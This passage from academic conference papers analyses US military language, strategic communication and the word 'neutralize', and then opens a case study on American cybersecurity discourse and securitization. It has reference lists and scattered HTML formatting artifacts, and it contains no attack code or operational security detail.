end of this gap has been given multiple roles <strong>in</strong> the Grand Military Narrative, where it is referred to as<br />
terrorism or asymmetric warfare. What comes to cyberspace, the constant debates on the advancement<br />
of potential adversaries and the state of national cyber security keep cyber warfare high on the list of<br />
priorities.<br />
The tradition of Grand Military Narrative stems from the <strong>in</strong>dustrial age identity. Technology symbolises<br />
manmade evolution and is <strong>in</strong> the service of virtue. The possessors of technology make their own dest<strong>in</strong>y.<br />
The Grand Military Narrative presents technology as a solution and prerequisite.<br />
In warfare, this is manifested by concepts such as Effects Based Operations and the Comprehensive<br />
Approach. High-tech weapons are 'precise' and 'reduce collateral damage and civilian casualties' and<br />
help to rid the world of the 'bad guys'.<br />
What makes this war 'new' is its spread to doma<strong>in</strong>s which have traditionally been seen as civilian. The<br />
military-<strong>in</strong>dustrial complex has resulted <strong>in</strong> the presence of companies such as Blackwater (or Xe) <strong>in</strong> Iraq,<br />
<strong>in</strong> civilian weapons manufacturers benefit<strong>in</strong>g from the ongo<strong>in</strong>g conflicts, and <strong>in</strong> military presence <strong>in</strong><br />
enterta<strong>in</strong>ment and education. Technology is part of American ideal of 'easy liv<strong>in</strong>g' as it maximises output<br />
and m<strong>in</strong>imizes <strong>in</strong>put (cit<strong>in</strong>g Lyotard, 1984 <strong>in</strong> Rantapelkonen, 2006:73). Companies such as Raytheon<br />
develop exoskeleton suits that turn an overweight teenager <strong>in</strong>to a human/term<strong>in</strong>ator crossover<br />
(Raytheon, 2010). In the US, the military recruits from shopp<strong>in</strong>g malls by <strong>in</strong>vit<strong>in</strong>g the youth to play war<br />
with (Pentagon funded) computer games under the supervision of army recruiters (McLeroy, 2007). High<br />
school kids and college students are offered a chance to "earn respect", "get noticed by a nationwide<br />
cybersecurity community" and "help the U.S. beat the bad guys" by attend<strong>in</strong>g a "cyber challenge"<br />
competition (US Cyber Challenge, 2010). These projects all demonstrate the trend <strong>in</strong> the (r)evolution of<br />
warfare. Warfare symbolizes technology and distance, the "disappearance" (Virilio, 2009). Lyotard argues<br />
that technology is “good” because it is efficient, not because it is “true”, “just” or “beautiful” (cit<strong>in</strong>g Lyotard,<br />
1984, <strong>in</strong> Rantapelkonen, 2006:73)<br />
The (r)evolution has thus created a gap between the adversaries, which has brought about the paradox<br />
<strong>in</strong> the attitudes towards technology. On one hand, there is the desire to develop technological capability,<br />
be able to wage war from a distance, possibly anonymously, comb<strong>in</strong>e effects with m<strong>in</strong>imal effort, and to<br />
to achieve m<strong>in</strong>imal physical presence <strong>in</strong> the battle field. These trends are argued with certa<strong>in</strong> threat<br />
scenarios, such as global terrorism or the cyber capability of the adversary. On the other hand, these<br />
developments create a distance between the warwag<strong>in</strong>g parties - asymmetry. The US is combat<strong>in</strong>g<br />
aga<strong>in</strong>st roadside and suicide bomb<strong>in</strong>gs and cyber attacks, which are easy and cheap for the attacker to<br />
realize, and difficult to defend aga<strong>in</strong>st. The American response to this is deterrence:<br />
We must tailor deterrence to fit particular actors, situations, and forms of warfare. The same<br />
developments that add to the complexity of the challenge also offer us a greater variety of<br />
capabilities and methods to deter or dissuade adversaries. This diversity of tools, military<br />
and non-military, allows us to create more plausible reactions to attacks <strong>in</strong> the eyes of<br />
opponents and a more credible deterrence to them. In addition, changes <strong>in</strong> capabilities,<br />
especially new technologies, permit usto create <strong>in</strong>creas<strong>in</strong>gly credible defenses to conv<strong>in</strong>ce<br />
would-be attackers that their efforts are ultimately futile. (2008 National Defense Strategy)<br />
This is the Grand Military Narrative. Technology is both a threat and a solution: it creates the gap<br />
between the rich, hi-tech 'us' and the poor, low-tech 'them'. The American response to this threat is<br />
deterrence - <strong>in</strong> the form of technology. In military discourse the 'new war' is present <strong>in</strong> technologycentered<br />
descriptions of Action and Effects, discussed <strong>in</strong> the next chapter<br />
3. Strategic communication: The battle of narratives<br />
NATO def<strong>in</strong>es strategic communication as<br />
the coord<strong>in</strong>ated and appropriate use of NATO communications activities and capabilities -<br />
Public Diplomacy, Public Affairs (PA), Military Public Affairs, Information Operations (Info<br />
Ops) and Psychological Operations (PSYOPS), as appropriate - <strong>in</strong> support of Alliance<br />
policies, operations and activities, and <strong>in</strong> order to advance NATO’s aims (Simon and<br />
Duzenli, 2009)<br />
156
Saara Jantunen<br />
Instead of white, grey and black propaganda we now have strategic communication, a comb<strong>in</strong>ation of<br />
public diplomacy (state/political level), public affairs (media) and <strong>in</strong>formation operations (military),<br />
previously also referred to as perception management (Taylor, 2003). Strategic communication is the<br />
vehicle for positive narratives that w<strong>in</strong> the hearts and m<strong>in</strong>ds.<br />
In US strategy, the need for the battle of narratives is recognized:<br />
Dom<strong>in</strong>at<strong>in</strong>g the narrative of any operation, whether military or otherwise, pays enormous<br />
dividends. Failure to do so underm<strong>in</strong>es support for policies and operations, and can actually<br />
damage a country’s reputation and position <strong>in</strong> the world. In the battle of narratives, the<br />
United States must not ignore its ability to br<strong>in</strong>g its considerable soft power to bear <strong>in</strong> order<br />
to re<strong>in</strong>force the positive aspects of Jo<strong>in</strong>t Force operations. Humanitarian assistance,<br />
reconstruction, secur<strong>in</strong>g the safety of local populations, military-to-military exercises, health<br />
care, and disaster relief are just a few examples of the positive measures that we offer.<br />
(United States Jo<strong>in</strong>t Forces Command, 2010)<br />
In other words, the American military should be associated with positively evaluated narratives. Like the<br />
Comprehensive Approach that recognizes the need for both military and non-military resources <strong>in</strong><br />
operations, strategic communication draws from the same resources:<br />
The complexity of the future suggests that the education of senior officers must not rema<strong>in</strong><br />
limited to staff and war colleges, but should extend to the world’s best graduate schools.<br />
Professional military education must impart the ability to th<strong>in</strong>k critically and creatively <strong>in</strong> both<br />
the conduct of military operations and acquisition and resource allocation. The Services<br />
should draw from a breadth and depth of education <strong>in</strong> a range of relevant discipl<strong>in</strong>es to<br />
<strong>in</strong>clude history, anthropology, economics, geopolitics, cultural studies, the ‘hard’ sciences,<br />
law, and strategic communication. (United States Jo<strong>in</strong>t Forces Command, 2010)<br />
Strategic communication manifested by the battle of narratives creates the need for discourse patterns<br />
and evaluation that "re<strong>in</strong>force the positive aspects" of military operations. "At the end of the day, it is the<br />
perception of what happened that matters more than what actually happened. (United States Jo<strong>in</strong>t Forces<br />
Command, 2010)"<br />
In addition to narratives, the structures of language convey evaluations. Sometimes unfavourable<br />
decisions have to be made and actions taken. This <strong>in</strong>convenience is coded <strong>in</strong> l<strong>in</strong>guistic structure. As<br />
Luk<strong>in</strong> (2005: 6-7) argues, military operations are often described as hav<strong>in</strong>g no scope: 'operations are<br />
conducted' as if the action was muted without mention of the target of the action. Further, the lexical<br />
choices reflect the abstraction of military discourse:<br />
Note the use of words like ‘operations’ and ‘actions’, or verb forms like ‘operat<strong>in</strong>g’, ‘do<strong>in</strong>g’,<br />
and ‘conduct<strong>in</strong>g’, which are highly generalized terms cover<strong>in</strong>g for a whole range of more<br />
specific processes. So when General Franks says Our coalition special operations forces<br />
cont<strong>in</strong>ue their actions throughout all of Iraq, this allows him to generalize away from the<br />
specific actions of ‘attack<strong>in</strong>g’, ‘destroy<strong>in</strong>g’, ‘kill<strong>in</strong>g’, ‘wound<strong>in</strong>g’, etc. (Luk<strong>in</strong>, 2005: 7)<br />
Strategic communication would not report the enemy to 'conduct operations' or 'cont<strong>in</strong>ue to move'.<br />
Instead, the enemy action would typically be lexicalized with more concrete, high modality action<br />
descriptions. Language is ideological, and strategic communication uses it to advance its cause.<br />
These action descriptions are <strong>in</strong> the very core of strategic communication. Accord<strong>in</strong>g to Foucault (2010:<br />
105), the verb serves the function of affirmation: it declares that the person us<strong>in</strong>g the verb not only<br />
understands the names of th<strong>in</strong>gs but ecaluates them. Halliday's functional language theory shares this<br />
view and emphasizes Action as the core of language (see Halliday, 2004).<br />
4. Actions and effects<br />
In military discourse Actions are often represented by descriptions of Effects, which emphasize the end<br />
state. In this paper these Effects are divided <strong>in</strong>to two groups, k<strong>in</strong>etic (physical) or <strong>in</strong>formational.<br />
Table 1 presents a list of Information Operations Effects, but as can be noticed, many of the descriptions<br />
are also used <strong>in</strong> conventional warfare:<br />
157
Saara Jantunen<br />
Table 1: "Sample IO desired effects compiled from various sources" (as presented <strong>in</strong> Allen, 2005: 75)<br />
Access Dim<strong>in</strong>ish Mislead<br />
Cascad<strong>in</strong>g network failure Dislocate Negate<br />
Control Disrupt Neutralize<br />
Coord<strong>in</strong>ation failure Distract Operational failure<br />
Create <strong>in</strong>formation vacuum Divert Paralysis<br />
Decapitate Exploit Penetrate<br />
Decision paralysis Expose Prevent<br />
Defeat Halt Protect<br />
Degrade Harass Read<br />
Delay Influence Safeguard<br />
Deny Inform Shape<br />
Destroy Interrupted Shock<br />
Desynchronize Lose confidence <strong>in</strong> <strong>in</strong>formation Stimulate<br />
Deter Lose confidence <strong>in</strong> network Stop<br />
Manipulate<br />
Actions/Effects are understood as either tactical-operational or strategic accord<strong>in</strong>g to their communicative<br />
function. An Action description may have multiple read<strong>in</strong>gs, depend<strong>in</strong>g on its context. These two<br />
categories are discussed <strong>in</strong> the follow<strong>in</strong>g chapter.<br />
4.1 Tactical-operational Action descriptions<br />
Dur<strong>in</strong>g a war or a military operation, there is a number of actions the participat<strong>in</strong>g forces may carry out.<br />
These actions may be referred to with action decriptions such as defend, attack, penetrate, target, control<br />
or destroy. In this paper, this type of descriptions are referred to as the tactical-operational level of<br />
communication. The function of this level of communication is to verbalize the actions <strong>in</strong> different theaters<br />
of war. The terms are concrete and applicable to both 'self' and the enemy.<br />
This is not to say that tactical-operational Action descriptions are free of evaluation. When tacticaloperational<br />
Action descriptions are applied to 'self', the purpose is often to demonstrate force and<br />
capacity. In turn, descriptions of the enemy defend<strong>in</strong>g are typically few. The terms clearly denote different<br />
levels of modality and appraisal. Defend has a lower modality than attack, and it is also more positive<br />
than negative: Defence is always a legitimate action, whereas attack<strong>in</strong>g signals greater use of force,<br />
either legitimate or illegitimate. The tactical-operational level engages the parameters of legitimity and<br />
positivity/negativity.<br />
The war <strong>in</strong> Iraq has been go<strong>in</strong>g for roughly one week. Good progress has been made. The<br />
coalition forces have control of the air. They have moved from the Iraq border <strong>in</strong> the south to<br />
with<strong>in</strong> 50 miles of Baghdad. We have forces <strong>in</strong> the south, <strong>in</strong> the west, <strong>in</strong> the north. The socalled<br />
Republican Guard forces are r<strong>in</strong>g<strong>in</strong>g Baghdad some 40-50 miles away from it, and<br />
very likely that will be some of the toughest fight<strong>in</strong>g that will occur and that's yet ahead of us.<br />
(Department of Defense, 2003a)<br />
This can be understood as a description of an advanc<strong>in</strong>g military operation, although the text may have a<br />
rhetorical read<strong>in</strong>g. Coalition forces are described as <strong>in</strong> control and their actions successful. However,<br />
these descriptions are 'traditional' military vocabulary and can be analyzed as positive or negative,<br />
legitimate or illegitimate, and of low or high modality.<br />
Dur<strong>in</strong>g the first days of the war <strong>in</strong> Iraq, Secretary of Defense Donald Rumsfeld (Department of Defense,<br />
2003b) described the enemy as follows:<br />
They took one person last week and cut his tongue out and left him to bleed to death <strong>in</strong> the<br />
public square. This is a vicious, vicious regime. If he tells one of his henchmen to go out and<br />
say that, and tells him precisely what to say, he either says it or he's shot.<br />
The regime has committed acts of treachery on the battlefield dress<strong>in</strong>g their forces as<br />
liberated civilians, and send<strong>in</strong>g soldiers out wav<strong>in</strong>g white flags and feign<strong>in</strong>g surrender, with<br />
the goal of draw<strong>in</strong>g coalition forces <strong>in</strong>to the ambushes; us<strong>in</strong>g Red Cross vehicles to courier<br />
military <strong>in</strong>structions. These are serious violations of the laws of war. The regime's actions<br />
158
Saara Jantunen<br />
have had little practical military effect thus far, but they do serve as a tell<strong>in</strong>g rem<strong>in</strong>der of why<br />
it is important that this regime be removed.<br />
These are examples of classic demonization. What is noteworthy is that the enemy is not described with<br />
the Action descriptions of the tactical-operational level. They do not attack or even destroy, but 'cut out<br />
tongues' and 'commit acts of treachery'. By not describ<strong>in</strong>g the enemy actions with descriptions of military<br />
action, the enemy is denied the status of a real military force, and associated with crim<strong>in</strong>als and terrorists.<br />
To summarize, tactical-operational Action descriptions have two ma<strong>in</strong> uses: They may aim for neutral<br />
communication, but often demoniz<strong>in</strong>g is done not by apply<strong>in</strong>g high-modality Action descriptions, not even<br />
the k<strong>in</strong>d that denote illegitimate action, to discuss the enemy action. Demoniz<strong>in</strong>g is done by reserv<strong>in</strong>g<br />
tactical-operational lexicon only for describ<strong>in</strong>g 'us'. However, there is a strategic level of communication,<br />
which conta<strong>in</strong>s descriptions of legitimate military action that are never applied to both 'self' and the<br />
enemy. This level will be discussed next.<br />
4.2 Strategic Action descriptions<br />
When Action descriptions become more abstract and less applicable to the enemy, there is also a shift<br />
from the tactical-operational level to the strategic level. Terms such as liberate and stabilize are<br />
examples of strategic level 'rhetorization', where ambiguosity <strong>in</strong>creases and the Action descriptions are<br />
superord<strong>in</strong>ate terms that can be understood <strong>in</strong> several ways. Strategic level typically conta<strong>in</strong>s Action<br />
descriptions that are applicable to 'us' or 'them' only:<br />
This war is an act of self defense, to be sure, but it is also an act of humanity. Coalition<br />
forces are elim<strong>in</strong>at<strong>in</strong>g a regime that is responsible for the deaths of hundreds of thousands<br />
of its own people and which is pursu<strong>in</strong>g weapons that would enable it to kill hundreds of<br />
thousands more. (Department of Defense, 2003c)<br />
While the enemy is described with lexicon that is more applicable to crim<strong>in</strong>als than the military, the 'self' is<br />
glorified <strong>in</strong> several ways: In Iraq, the coalition forces were do<strong>in</strong>g self defence (a word choice to denote<br />
legitimity) and elim<strong>in</strong>at<strong>in</strong>g a killer regime. Of course, <strong>in</strong> March 2003 self defence (lower modality) was<br />
carried out by series of attacks (higher modality) and elim<strong>in</strong>at<strong>in</strong>g by whatever the means necessary to<br />
<strong>in</strong>flict enemy casualties. Both self defence and elim<strong>in</strong>ate are more abstract and ambiguous than the given<br />
alternatives, and rarely, if at all, associated with enemy action.<br />
What both the tactical-operational and the strategic level descriptions have <strong>in</strong> common is that they are<br />
usually clearly positive or negative and it is possible to determ<strong>in</strong>e their level of modality compared to<br />
other Action descriptions. 'Self' is rarely associated with the negatively evaluated Action descriptions,<br />
unless there is a good rhetorical reason. 'Self' is described as resourceless and weak <strong>in</strong> cyber discourse<br />
(see Cybersecurity Act of 2009) as part of threat discourse, <strong>in</strong> order to securitize the <strong>in</strong>ternet.<br />
In short, strategic motives beh<strong>in</strong>d discourse are recognizable from either strong evaluation or exclusion.<br />
Of all descriptions of Action or Affects, the term neutralize is perhaps the best example of strategic level<br />
usage.<br />
4.3 The semantic puzzle of the term 'neutralize'<br />
When the war on Iraq started <strong>in</strong> March 2003, the Pentagon was quick to comment on their strategy and<br />
doctr<strong>in</strong>e. Colonel Crowder, (Chief, Strategy, Concepts and Doctr<strong>in</strong>e) elaborated on the concept of Effects<br />
Based Operations (EBO):<br />
Let me talk a little bit about how we do this. Everyth<strong>in</strong>g -- first of all, there's not a target that<br />
we would strike that is not specifically struck to achieve a desired effect. And so we look at<br />
that target and we say, what do we want to do to that target? I want to neutralize or I want to<br />
destroy this bunker. And then I exam<strong>in</strong>e what munitions I might use to destroy that bunker.<br />
Ideally, if you could turn the lights off and make everybody go to sleep, that would be really<br />
nice. Unfortunately, some of our capabilities are not quite that advanced, and <strong>in</strong> many cases,<br />
we have to resort to physical destruction.<br />
Here the Action descriptions neutralize and destroy are used contrastively. The US Department of<br />
Defence def<strong>in</strong>es the terms neuralization and neutralize as follows (DOD Dictionary):<br />
159
Saara Jantunen<br />
neutralization — (*) In m<strong>in</strong>e warfare, a m<strong>in</strong>e is said to be neutralized when it has been<br />
rendered, by external means, <strong>in</strong>capable of fir<strong>in</strong>g on passage of a target, although it may<br />
rema<strong>in</strong> dangerous to handle.<br />
neutralize — 1. As perta<strong>in</strong>s to military operations, to render <strong>in</strong>effective or unusable. 2. To<br />
render enemy personnel or material <strong>in</strong>capable of <strong>in</strong>terfer<strong>in</strong>g with a particular operation.<br />
These def<strong>in</strong>itions emphasize that neutraliz<strong>in</strong>g is an action that lessens the target or object of action,<br />
makes it less (or not) capable of operat<strong>in</strong>g, and so removes the threat it poses. Dur<strong>in</strong>g the Iraqi war the<br />
term has been associated with the follow<strong>in</strong>g objects:<br />
Table 2: Configurations with the Process 'neutralize'<br />
Action Object Year and source<br />
neutralize adversary forces (Emmet, 1996)<br />
neutralize electrical power (Department of Defense, 2003c)<br />
neutralise anti-Iraqi forces Department of Defense, 2006a)<br />
neutralize the enemy (Department of Defense, 2006b)<br />
neutralise the threat (Department of Defense, 2006c)<br />
neutralize bottom and moored m<strong>in</strong>es (Department of Defense, 2010b)<br />
Here, neutralize carries a variety of mean<strong>in</strong>gs, from mak<strong>in</strong>g <strong>in</strong>effective or non-existent to destroy<strong>in</strong>g and<br />
kill<strong>in</strong>g. The practical use differs from the def<strong>in</strong>ition of the word.<br />
In Taylor's (2007) categorization, neutralize is an Effect, categorized as a "long-term desired effect". It is<br />
listed along with terms that could be categorized as tactical-operational Action descriptions, such as<br />
decapitate, defeat, or stop. However, it is different than most Action (or Effect) descriptions:<br />
'Neutralize' operates on both tactical-operational and strategic level:<br />
As the above chart demonstrates, neutralize is a term that can be used to describe both concrete,<br />
tactical-operational Actions, such as neutraliz<strong>in</strong>g m<strong>in</strong>es or the enemy, and strategic Actions, such as<br />
neutraliz<strong>in</strong>g <strong>in</strong>surgency or a threat. The latter is much like the use of the term stabilize - an abstract<br />
subord<strong>in</strong>ate term. These Action descriptions may refer to a variety of actions, and <strong>in</strong> fact, these terms<br />
could be used synonymously. One may argue that both neutraliz<strong>in</strong>g and stabiliz<strong>in</strong>g could be achieved by<br />
the use of weapons, through education, development aid, or an embargo. The terms are ambiguous and<br />
multi-layered, which means they may be given several mean<strong>in</strong>gs. The fact that a term may operate on<br />
both concrete and abstract level adds to its ambiguousity: neutraliz<strong>in</strong>g may be the result of an <strong>in</strong>formation<br />
operation or the use of k<strong>in</strong>etic weapons.<br />
Certa<strong>in</strong> terms are exclusive <strong>in</strong> their use:<br />
As discussed earlier <strong>in</strong> this chapter, military discourse has a set of vocabulary for discuss<strong>in</strong>g 'self' and the<br />
enemy. Some of this vocabulary apply to both groups (attack, defend, operate, control). Demonis<strong>in</strong>g is<br />
always negative and always refers to the enemy, whereas glorify<strong>in</strong>g is positive and refers to 'self'.<br />
Neutralize is a term that is, quite literally, neutral. It is very difficult to place it on the positive/negative or<br />
legitimacy parameters. However, it is one of the most used 'effect descriptions' of warfare based on<br />
system th<strong>in</strong>k<strong>in</strong>g. It is a term that is reserved for describ<strong>in</strong>g 'our' actions only - never the enemy. This<br />
means that there is a third parameter: the <strong>in</strong>clusive/exclusive parameter that creates the distance<br />
between 'self' and the enemy without obvious evaluation.<br />
Because neutralize is exclusive <strong>in</strong> its use, it means the term is not tactical-operational nor value-free. The<br />
fact that its orig<strong>in</strong>al def<strong>in</strong>ition and its practical usage differ from each other tells about rhetorization:<br />
speakers must have a reason why they use a term to describe an Action of a higher modality than Action<br />
description used.<br />
To summarize, the follow<strong>in</strong>g figure demonstrates the parameter system when analyz<strong>in</strong>g descriptions of<br />
Actions and Effects:<br />
160
Figure 1: Parameter system<br />
Saara Jantunen<br />
The concept of war has become ambiguous and war distant. As a term, neutralize symbolizes this<br />
ambiguity and distance. Neutraliz<strong>in</strong>g is a tactic and strategy of Effects Based Operations and the<br />
Comprehensive Approach, science and advancement, and it communicates the b<strong>in</strong>ary ideology of<br />
science <strong>in</strong> the service of virtue on one hand, and dom<strong>in</strong>ance through destruction on the other. As a<br />
subord<strong>in</strong>ate term, it covers a whole range of use of force without. As a n Effect description, it symbolizes<br />
strategic communication <strong>in</strong> the l<strong>in</strong>guistic tradition of the RMA.<br />
5. Conclusion<br />
Whether sterile or hostile, beh<strong>in</strong>d strategic communication there is an ideology of technological seclusion.<br />
This contradicts the views of Generals Petraeus and McChrystal, who argue for communicat<strong>in</strong>g and<br />
network<strong>in</strong>g with the Afghan population. However, communication directed at the American public rema<strong>in</strong>s<br />
<strong>in</strong>volved with narratives of the morally corrupt enemy and the omnipotence of technology. Even though<br />
people are now recognized as the center of gravity <strong>in</strong> warfare <strong>in</strong>stead of weapons and technology,<br />
current military discourse still emphasizes deterrence and the role of technology. This is the result of the<br />
complex ties between the military <strong>in</strong>dustry and government. At the same time, the 'battle of narratives'<br />
pushes communication towards descriptions of 'soft power' and b<strong>in</strong>ary rhetoric.<br />
The technology-centered perception of warfight<strong>in</strong>g is result<strong>in</strong>g <strong>in</strong> discourse that <strong>in</strong>creas<strong>in</strong>gly describes<br />
Action as someth<strong>in</strong>g enabled by and executed through technology. The paradox is <strong>in</strong> the representation:<br />
the words do not match the reality they refer to, or have no concrete representation <strong>in</strong> the physical world.<br />
Neutralize is an example of this. Abstract war requires abstract concepts to verbalize it.<br />
References<br />
Emmet, P. (1996) 'Six Emerg<strong>in</strong>g Trends <strong>in</strong> Information Management', Defense Issues: Volume 11, Number 16.<br />
[Onl<strong>in</strong>e] Available: http://www.defense.gov/Speeches/Speech.aspx?SpeechID=885 [30 Jan 2011]<br />
Foucault, M. (2010) Sanat ja asiat. Eräiden ihmistieteiden arkeologia. Hels<strong>in</strong>ki: Gaudeamus<br />
Halliday, M.A.C. (2004) An Introduction to Functional Grammar. Revised by Matthiessen, C.M.I.M, London: Arnold.<br />
Luk<strong>in</strong>, A. (2005) 'Information warfare: The grammar of talk<strong>in</strong>g war', Social Alternatives Vol. 24 No. 1, First Quarter,<br />
pp. 5-10.<br />
McLeroy, C. (2008) 'Army Experience Center opens <strong>in</strong> Philadelphia', Army News Service, 29 Aug [Onl<strong>in</strong>e] Available:<br />
http://www.army.mil/-news/2008/09/02/12072-army-experience-center-opens-<strong>in</strong>-philadelphia/ [30 Jan 2011]<br />
Pang, F. (1997) Quality of Life: A Military Preparedness Priority, Defense Issues, volume 12, number 36 [Onl<strong>in</strong>e]<br />
Available: http://www.defense.gov/speeches/speech.aspx?speechid=765 [30 Jan 2011]<br />
Rantapelkonen, J. (2006) The Narrative Leadership of War: Presidential Phrases <strong>in</strong> the 'War on Terror' and their<br />
Relation to Information Technology. Doctoral Dissertation. Publication Series 1, Research n:o 34, Hels<strong>in</strong>ki:<br />
National Defence University.<br />
161
Saara Jantunen<br />
Raytheon (2010) 'Time Magaz<strong>in</strong>e Names the XOS 2 Exoskeleton "Most Awesomest" Invention of 2010', [Onl<strong>in</strong>e]<br />
Available: http://www.raytheon.com/newsroom/technology/rtn08_exoskeleton/ [30 Jan 2011]<br />
Simon, G. & Duzenli, M. (2009) 'The comprehensive plann<strong>in</strong>g directive', NRDC-ITA Magaz<strong>in</strong>e, Issue nr. 14, [Onl<strong>in</strong>e]<br />
Available: http://www.nato.<strong>in</strong>t/nrdc-it/magaz<strong>in</strong>e/2009/0914/0914g.pdf [Jan 30 2011]<br />
Taylor, P. (2003) Munitions of the M<strong>in</strong>d: A History of Propaganda from the Ancient World to the Present Day, 3rd<br />
edition, Manchester: Manchester University Press.<br />
The Cybersecurity Act of 2009 (S 773 IS) (2009) Act. [Onl<strong>in</strong>e] Available: http://frwebgate.access.gpo.gov/cgib<strong>in</strong>/getdoc.cgi?dbname=111_cong_bills&docid=f:s773rs.txt.pdf<br />
[30 Jan 2011]<br />
United States Jo<strong>in</strong>t Forces Command. (2010) The Jo<strong>in</strong>t Operat<strong>in</strong>g Environment 2010, [Onl<strong>in</strong>e] Available:<br />
http://www.jfcom.mil/newsl<strong>in</strong>k/storyarchive/2010/JOE_2010_o.pdf [19 Oct 2010].<br />
United States Jo<strong>in</strong>t Forces Command (2010) The Jo<strong>in</strong>t Operat<strong>in</strong>g Environment 2010 [Onl<strong>in</strong>e], Available:<br />
http://www.jfcom.mil/newsl<strong>in</strong>k/storyarchive/2010/JOE_2010_o.pdf [19 Oct 2010].<br />
US Cyber Challenge (2010) USCC, [onl<strong>in</strong>e] Available: http://www.uscyberchallenge.org/ [2 Jan 2011]<br />
US Department of Defense (2003a) DoD News Brief<strong>in</strong>g - ASD PA Clarke and Maj. Gen. McChrystal, Transcript, 29<br />
March, [Onl<strong>in</strong>e] Available: http://www.defense.gov/transcripts/transcript.aspx?transcriptid=2182 [30 Jan 2011]<br />
US Department of Defense (2003b) DoD News Brief<strong>in</strong>g - Secretary Rumsfeld and Gen. Myers, Transcript, March 25,<br />
[Onl<strong>in</strong>e] Available: http://www.defense.gov/transcripts/transcript.aspx?transcriptid=2141 [30 Jan 2011]<br />
US Department of Defense (2003c) Effects Based Operations Brief<strong>in</strong>g, Transcript, 19 March, [Onl<strong>in</strong>e] Available:<br />
http://www.defense.gov/Transcripts/Transcript.aspx?TranscriptID=2067 [30 Jan 2011]<br />
US Department of Defense (2005) Defense Department Special Brief<strong>in</strong>g on <strong>Security</strong> Operations <strong>in</strong> Baghdad,<br />
Transcript, 15 July [Onl<strong>in</strong>e] Available: http://://www.defense.gov/transcripts/transcript.aspx?transcriptid=3179<br />
[30 Jan 2011]<br />
US Department of Defense (2006a) DoD News Brief<strong>in</strong>g with Col Snow from Iraq, Transcript, 30 June, [Onl<strong>in</strong>e]<br />
Available: http://www.defense.gov/transcripts/transcript.aspx?transcriptid=18 [ 30 Jan 2011]<br />
US Department of Defense (2006b) DoD News Brief<strong>in</strong>g with Maj. Gen. Thomas B. Turner II from Iraq, Transcript, 8<br />
Sep [Onl<strong>in</strong>e] Available: http://www.defense.gov/transcripts/transcript.aspx?transcriptid=3716<br />
US Department of Defense (2006c ) DoD News Brief<strong>in</strong>g with Maj. Gen. Thomas B. Turner II from Iraq, Transcript, 6<br />
Sep, [Onl<strong>in</strong>e] Available: http://www.defense.gov/speeches/speech.aspx?speechid=1136 [30 Jan 2011]<br />
U.S. Department of Defense (2008) 2008 National Defense Strategy, [Onl<strong>in</strong>e], Available:<br />
http://www.defense.gov/news/2008%20national%20defense%20strategy.pdf [30 Jan 2010]<br />
US Department of Defense (2010a) DOD News Brief<strong>in</strong>g with Secretary Gates and Adm. Mullen from the Pentagon<br />
[Onl<strong>in</strong>e] Available: http://www.defense.gov/transcripts/transcript.aspx?transcriptid=4728 [30 Jan 2011]<br />
US Department of Defense (2010b) Contracts Air Force No. 868-10, 23 Sep, [Onl<strong>in</strong>e] Available:<br />
http://www.defense.gov/contracts/contract.aspx?contractid=4373 [30 Jan 2011]<br />
Virilio, P. (2009) The Aesthetics of Disappearance, Translated by Philip Beitchman, Los Angeles: Semiotext(e).<br />
162
A Case-Study on American Perspectives on Cyber and<br />
<strong>Security</strong><br />
Saara Jantunen and Aki-Mauri Huht<strong>in</strong>en<br />
National Defence University, F<strong>in</strong>land<br />
sijantunen@gmail.com<br />
aki.huht<strong>in</strong>en@mil.fi<br />
Abstract: In 2009, the Cybersecurity Act of 2009 was <strong>in</strong>troduced to U.S. Congress while the media were report<strong>in</strong>g<br />
about Ch<strong>in</strong>a's role <strong>in</strong> the Ghostnet-network. In 2010, WikiLeaks and selected newspapers published confidential<br />
documents, stirr<strong>in</strong>g up a cybersecurity debate. This article discusses these narratives <strong>in</strong> the context of securitization.<br />
The methodology consists of l<strong>in</strong>guistic theory, namely the systemic functional language theory, and the securitization<br />
theory of the Copenhagen School. The analysis realizes as exam<strong>in</strong>ation of the structures and evaluations of the<br />
action descriptions referr<strong>in</strong>g to the threat. As a result we can see that cyber discourse is a synonym to threat<br />
discourse. The agenda of cyber discourse is not purely about security, but is a reflection of the battle over cyber<br />
authority and the question of its status as a battle space.<br />
Keywords: cyber, securitization, strategic communication, l<strong>in</strong>guistics<br />
1. Introduction<br />
At the moment of writ<strong>in</strong>g this article, the debate on cybersecurity is more aggressive than ever. This<br />
article aims to provide a method for approach<strong>in</strong>g threat discourses, us<strong>in</strong>g the concept of cybersecurity as<br />
an example. Not ignor<strong>in</strong>g the themes of the debate, this article aims to contribute to the methods of<br />
analyz<strong>in</strong>g security discourse and the l<strong>in</strong>guistic structures of securitization.<br />
Before discuss<strong>in</strong>g the l<strong>in</strong>guistic properties of the cybersecurity debate, it is reasonable to discuss the past<br />
narratives l<strong>in</strong>ked to the topic.<br />
After his <strong>in</strong>auguration, President Obama appo<strong>in</strong>ted Melissa Hathaway the Act<strong>in</strong>g Senior Director for<br />
Cyberspace for the National <strong>Security</strong> and Homeland <strong>Security</strong> Councils. She led the so-called 60-day<br />
cybersecurity review project, which resulted <strong>in</strong> Cyberspace Policy Review. At the same time, the<br />
Cybersecurity Act of 2009 was <strong>in</strong>troduced by senators Rockefeller and Snowe. This Act will be discussed<br />
more <strong>in</strong> detail <strong>in</strong> the follow<strong>in</strong>g chapters. However, it is not the only document concerned with<br />
cybersecurity issues. Papers such as Snoop<strong>in</strong>g Dragon and Ghostnet as well as several government<br />
white papers kept Ch<strong>in</strong>a and Ch<strong>in</strong>a's alleged cyber warfare aspirations <strong>in</strong> the headl<strong>in</strong>es. In 2010 another<br />
cyber scandal emerged, when WikiLeaks started to publish leaked documents.<br />
2. Cyber discourse <strong>in</strong> the 20th century<br />
In 1990, National Academy of Sciences released a report, start<strong>in</strong>g with the follow<strong>in</strong>g phrases (Bendrath,<br />
2004):<br />
We are at risk. Increas<strong>in</strong>gly, America depends on<br />
computers… Tomorrow’s terrorists may be able to do<br />
more damage with a keyboard than with a bomb.<br />
The open<strong>in</strong>g phrase of Cybersecurity Act 2009 sounds rhetorically very similar:<br />
The congress f<strong>in</strong>ds the follow<strong>in</strong>g: America’s failure to<br />
protect cyberspace is one of the most urgent national<br />
security problems fac<strong>in</strong>g the country.<br />
And not only this. The hypothetical cyber attack is compared to of 9/11, the biggest American trauma<br />
s<strong>in</strong>ce Pearl Harbor:<br />
[I]f the 9/11 attackers had chosen computers <strong>in</strong>stead of air planes as their weapons and had<br />
waged a massive assault on a U.S. bank, the economic consequences would have been ‘‘an<br />
163
Saara Jantunen and Aki-Mauri Huht<strong>in</strong>en<br />
